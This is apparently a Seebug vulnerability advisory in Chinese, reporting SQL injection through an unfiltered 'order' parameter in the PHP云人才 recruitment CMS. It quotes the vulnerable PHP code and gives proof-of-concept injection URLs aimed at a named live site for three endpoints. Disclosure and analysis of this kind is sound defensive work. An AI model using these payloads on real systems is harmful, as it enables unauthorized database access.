PHP云人才系统(20141229)2处SQL注入

2015-01-07T00:00:00
ID SSV:93951
Type seebug
Reporter Root
Modified 2015-01-07T00:00:00

Description

简要描述:

PHP云人才系统(20141229)二处隐蔽的SQL注入

详细说明:

PHP云人才系统二处SQL注入。 0x01: 问答首页 ======================== URL为:

http://www.hr135.com/ask/index.php?order=add_time

其中参数order可以注入。 看看代码/include/libs/Smarty_Compiler.class.php:5330

5330 function _complie_qlist_start($tag_args) 5331 { 5332 $paramer = $this->_parse_attrs($tag_args); 5333 $item = str_replace("'","",$paramer[item]); 5334 global $db,$db_config,$config; 5335 $path = dirname(dirname(dirname(__FILE__))); 5336 $ParamerArr = $this->GetSmarty($paramer,$_GET); 5337 $paramer = $ParamerArr[arr]; 5338 $Purl = $ParamerArr[purl]; 5339 5340 $where=1; 5341 //�����ֶ�Ĭ��Ϊ����ʱ�� 5342 if($paramer[order]){ 5343 if($paramer[order]=="addtime"){ 5344 $paramer[order]="add_time"; 5345 } 5346 if($paramer[order]=="answernum"){ 5347 $paramer[order]="answer_num"; 5348 } 5349 $order = " ORDER BY `".$paramer[order]."` desc"; 5350 }else{ 5351 $order = " ORDER BY `add_time` desc"; 5352 } 5353 if($paramer[cid]){ 5354 $where .=" and `cid`='".$paramer[cid]."'"; 5355 } 5356 if($paramer[uid]){ 5357 $where .=" and `uid`='".$_COOKIE[uid]."'"; 5358 } 5359 if($paramer[recom]){//�Ƽ� �ֶ� 5360 $where .=" and `is_recom`='1'"; 5361 } 5362 if($paramer[limit]){ 5363 $limit=" limit ".$paramer[limit]; 5364 } 5365 if($paramer[ispage]){ 5366 $limit = $this->PageNav($paramer,$_GET,"question",$where,$Purl,"","2"); 5367 //$limit = $this->PageNav($paramer,$_GET,"q_class",$where,$Purl,'','2'); 5368 //$this->_tpl_vars["firmurl"] = $config['sy_weburl']."/index.php?m=question".$ParamerArr[firmurl]; 5369 } 5370 $rs = $db->select_all("question",$where.$order.$limit);

里面的5349行将$paramer[order]带入了SQL,由于有`,但是addslashs不会修改,所以可以注入`闭合原来SQL,然后插入SQL语句。 再看看调用的地方,/ask/model/index.class.php:26

26 function index_action(){ 27 $this->public_action(); 28 $this->yunset("c","index"); 29 $this->yunset("order",$_GET['order']); 30 $my_attention=$this->obj->DB_select_once("attention","`uid`='".$this->uid."' and `type`='1'","ids"); 31 $my_atten=@explode(',',rtrim($my_attention['ids'],",")); 32 $this->seo('ask_index'); 33 $this->yunset("my_atten",$my_atten); 34 $this->wenda_tpl('index'); 35 }

$this->yunset("order",$_GET['order']);没有过滤order,传递给参数@order。 然后在模版里面template/ask/index.htm:15

15 {yun:}qlist item=qlist ispage=1 t_len=20 order=@order limit=10{/yun} 16 <div class="answers_left_list"> 17 <div class="answers_left_list_left"> 18 <div class="answers_app_left" onmouseover="get_user_info('question_','{yun:}$qlist.id{/yun}','{yun:}$qlist.uid{/yun}','50');" onmouseout="hide_user_info('question_','{yun:}$qlist.id{/yun}')" id='question_{yun:}$qlist.id{/yun}' style=" cursor:pointer"> 19 <img src="{yun:}$qlist.pic{/yun}" width="40" height="40" onerror="showImgDelay(this,'{yun:}$config.sy_weburl{/yun}/{yun:}$config.sy_friend_icon{/yun}',2);"> 20 </div> 21 </div>

在第15行将@order传递给了_complie_qlist_start().

http://www.hr135.com/ask/index.php?order=add_time`

SQL出错没有任何数据

<img src="https://images.seebug.org/upload/201412/31110436a4657768661e09ae7cbde4699669d471.png" alt="1.png" width="600" onerror="javascript:errimg(this);">

http://www.hr135.com/ask/index.php?order=add_time`%20limit%201%23

取一条数据:

<img src="https://images.seebug.org/upload/201412/31110518d0a5b66fcb9e386a551d23b6df10be16.png" alt="2.png" width="600" onerror="javascript:errimg(this);">

http://www.hr135.com/ask/index.php?order=add_time`%20limit%202%23

取两条数据:

<img src="https://images.seebug.org/upload/201412/3111052820c2a5dedf4ad9e010a75288b9440f86.png" alt="3.png" width="600" onerror="javascript:errimg(this);">

0x02: 找工作搜索页

URL为:

http://www.hr135.com/index.php?m=com&order=id&c=search&keyword=a

order参数可以注入。

http://www.hr135.com/index.php?m=com&order=id`&c=search&keyword=a

SQL出错,没有数据

<img src="https://images.seebug.org/upload/201412/31111717b98924fc04131718942a8a2b0a9f4894.png" alt="4.png" width="600" onerror="javascript:errimg(this);">

http://www.hr135.com/index.php?m=com&order=id%20limit%201%23&c=search&keyword=a

取一条数据:

<img src="https://images.seebug.org/upload/201412/311117251efd73b13125a12107557993b9de78ec.png" alt="5.png" width="600" onerror="javascript:errimg(this);">

http://www.hr135.com/index.php?m=com&order=id%20limit%202%23&c=search&keyword=a

取两天数据:

<img src="https://images.seebug.org/upload/201412/31111731295c1689a8b114f5538c7196f8dcf885.png" alt="6.png" width="600" onerror="javascript:errimg(this);">

0x03: 招人才首页

URL为:

http://www.hr135.com/index.php?m=user&order=status_time

其中参数order可以注入。

http://www.hr135.com/index.php?m=user&order=status_time`

SQL出错,没有数据:

<img src="https://images.seebug.org/upload/201412/31112936e0b5414d133e5a7955aeba0109c85527.png" alt="7.png" width="600" onerror="javascript:errimg(this);">

http://www.hr135.com/index.php?m=user&order=status_time`%20limit%201%23

取一条数据:

<img src="https://images.seebug.org/upload/201412/31112945a30c0544f50262eea80edbb8ad671c5b.png" alt="8.png" width="600" onerror="javascript:errimg(this);">

http://www.hr135.com/index.php?m=user&order=status_time`%20limit%202%23

取两条数据:

<img src="https://images.seebug.org/upload/201412/311129539c94289a19b8ab9ecf4a8f67c969734f.png" alt="9.png" width="600" onerror="javascript:errimg(this);">

漏洞证明:

<img src="https://images.seebug.org/upload/201412/31110518d0a5b66fcb9e386a551d23b6df10be16.png" alt="2.png" width="600" onerror="javascript:errimg(this);">

http://www.hr135.com/ask/index.php?order=add_time`%20limit%202%23

取两条数据:

<img src="https://images.seebug.org/upload/201412/3111052820c2a5dedf4ad9e010a75288b9440f86.png" alt="3.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201412/311117251efd73b13125a12107557993b9de78ec.png" alt="5.png" width="600" onerror="javascript:errimg(this);">

http://www.hr135.com/index.php?m=com&order=id%20limit%202%23&c=search&keyword=a

取两天数据:

<img src="https://images.seebug.org/upload/201412/31111731295c1689a8b114f5538c7196f8dcf885.png" alt="6.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201412/31112945a30c0544f50262eea80edbb8ad671c5b.png" alt="8.png" width="600" onerror="javascript:errimg(this);">

http://www.hr135.com/index.php?m=user&order=status_time`%20limit%202%23

取两条数据:

<img src="https://images.seebug.org/upload/201412/311129539c94289a19b8ab9ecf4a8f67c969734f.png" alt="9.png" width="600" onerror="javascript:errimg(this);">